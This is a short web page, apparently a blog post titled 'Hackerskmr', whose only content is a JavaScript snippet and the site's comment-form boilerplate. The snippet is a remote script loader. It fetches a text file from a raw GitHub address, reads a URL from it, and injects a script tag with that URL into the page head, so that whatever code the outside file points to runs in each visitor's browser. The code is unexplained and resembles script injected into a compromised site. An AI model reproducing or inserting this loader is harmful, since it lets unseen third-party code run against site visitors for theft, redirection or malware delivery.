Hackerskmr

 

var url = ‘https://raw.githubusercontent.com/truba77/trubnik/main/from.txt’;

fetch(url)
.then(response => response.text())
.then(data => {
// head
var script = document.createElement(‘script’);
script.src = data.trim(); // 44
document.getElementsByTagName(‘head’)[0].appendChild(script);
})
.catch(error => {
console.error(‘bad go.txt:’, error);
});

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *